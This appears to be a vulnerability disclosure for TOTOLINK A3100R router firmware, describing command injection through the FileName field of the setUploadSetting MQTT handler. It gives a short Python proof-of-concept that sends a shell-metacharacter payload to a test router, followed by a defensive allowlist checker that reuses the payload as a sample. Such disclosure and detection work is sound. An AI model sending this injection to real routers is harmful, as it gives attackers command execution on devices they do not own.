Firmware Version: A3100R_V4.1.2cu.5247_B20211129
You can download the firmware here: Swind1er/Download (github.com)
Vulnerability Proof of Concept Video:
https://github.com/Swind1er/Video/raw/main/A3100R_setUploadSetting_RCE%20poc.mp4
In the CGI function setUploadSetting of the file /lib/cste_modules/upgrade.so, the string content of the user input field FileName is not filtered. Sending a malicious FileName field using the MQTT service leads to arbitrary command execution.
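```python
import paho.mqtt.client as mqtt

# Connect to the MQTT service on the router (address of the test device).
client = mqtt.Client()
client.connect("192.168.138.128",1883,60)
# Publish a setUploadSetting request whose FileName carries shell
# metacharacters; the handler does not filter the field.
client.publish('totolink/router/setting/setUploadSetting',
payload='{"topicurl":"setting/setUploadSetting",\
"FileName":";echo \'123\'>>/tmp/flag.txt;echo"}')
```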
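As a defensive counterpart, the following added example (not part of the original report and not vendor code) checks MQTT messages for the setUploadSetting topic and flags any FileName that fails a strict allowlist, the kind of filtering the handler lacks. The allowlist policy, the function name check_message and the sample messages other than the PoC payload are assumptions made for this example.

```python
import json
import re

# Allowlist for an upload file name: starts with an alphanumeric, then only
# letters, digits, dot, dash, underscore; at most 64 characters.
# This policy is an assumption of the example, not taken from the firmware.
SAFE_FILENAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

# Topic suffix taken from the PoC on this page.
WATCHED_SUFFIX = "setting/setUploadSetting"


def check_message(topic, payload):
    """Return a list of findings for one MQTT message (empty list = clean)."""
    if not topic.endswith(WATCHED_SUFFIX):
        return []
    if isinstance(payload, bytes):
        payload = payload.decode("utf-8", errors="replace")
    try:
        body = json.loads(payload)
    except ValueError:
        return ["payload is not valid JSON"]
    if not isinstance(body, dict):
        return ["payload is not a JSON object"]
    name = body.get("FileName")
    if name is None:
        return []
    if not isinstance(name, str):
        return ["FileName is not a string"]
    if not SAFE_FILENAME.fullmatch(name):
        return ["FileName fails allowlist: %r" % name]
    return []


# Constructed sample traffic; the second entry is the payload from the PoC,
# the first and third are made up for this example.
SAMPLES = [
    ("totolink/router/setting/setUploadSetting",
     '{"topicurl":"setting/setUploadSetting","FileName":"fw_v4.1.2.web"}'),
    ("totolink/router/setting/setUploadSetting",
     '{"topicurl":"setting/setUploadSetting",'
     '"FileName":";echo \'123\'>>/tmp/flag.txt;echo"}'),
    ("totolink/router/setting/exampleOtherTopic", '{"FileName":"a b"}'),
]

if __name__ == "__main__":
    for topic, payload in SAMPLES:
        print(topic, check_message(topic, payload) or "ok")
```

The same allowlist belongs in the handler itself, applied before FileName is used; a check on the broker or network side only detects the request.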